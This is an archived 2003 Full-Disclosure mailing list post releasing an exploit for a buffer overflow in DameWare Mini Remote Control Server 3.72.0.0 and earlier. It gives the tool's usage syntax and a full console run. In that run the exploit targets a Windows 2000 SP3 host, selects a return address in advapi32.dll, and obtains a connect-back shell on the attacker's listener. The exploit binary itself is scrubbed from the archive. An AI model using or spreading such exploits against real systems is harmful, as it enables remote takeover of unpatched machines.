lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
From: netninja at hotmail.kg (Adik)
Subject: [Exploit]: DameWare Mini Remote Control Server Overflow Exploit

DameWare Mini Remote Control Server Exploit

C:\xploits\dmware>dmware

        ...oO DameWare Remote Control Server Overflow Exploit Oo...

                -( by Adik netmaniac[at]hotmail.KG )-

 - Versions vulnerable: <= DWRCS 3.72.0.0
 - Tested on: DWRCS ver: 3.72.0.0 Win2k SP3 & WinXP SP1

 Usage: dmware <TargetIP> <TargetPort> <YourIp> <YourPort>
 eg: dmware 10.0.0.1 6129 10.0.0.2 21


C:\xploits\dmware>dmware 192.168.63.130 6129 192.168.63.1 53

        ...oO DameWare Remote Control Server Overflow Exploit Oo...

                -( by Adik netmaniac[at]hotmail.KG )-

 - Versions vulnerable: <= DWRCS 3.72.0.0
 - Tested on: DWRCS ver: 3.72.0.0 Win2k SP3 & WinXP SP1

[*] Target IP:  192.168.63.130  Port: 6129
[*] Local IP:   192.168.63.1    Listening Port: 53

[*] Initializing sockets...                     [ OK ]
[*] Binding to local port: 53...                [ OK ]
[*] Setting up a listener...                    [ OK ]

 OS Info   : WIN2000 [ver 5.0.2195]
 SP String : Service Pack 3

 EIP: 0x77db912b (advapi32.dll)

[*] Constructing packet for WIN 2000 SP: 3...   [ OK ]
[*] Connecting to 192.168.63.130:6129...        [ OK ]
[*] Packet injected!
[*] Connection request accepted: 192.168.63.130:1056
[*] Dropping to shell...

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>exit
exit
[x] Connection closed.

C:\xploits\dmware>

------
cheerz,

Adik
-------------- next part --------------
A non-text attachment was scrubbed...
Name: dmware.rar
Type: application/octet-stream
Size: 22279 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20031219/b0023605/dmware.obj

Powered by blists - more mailing lists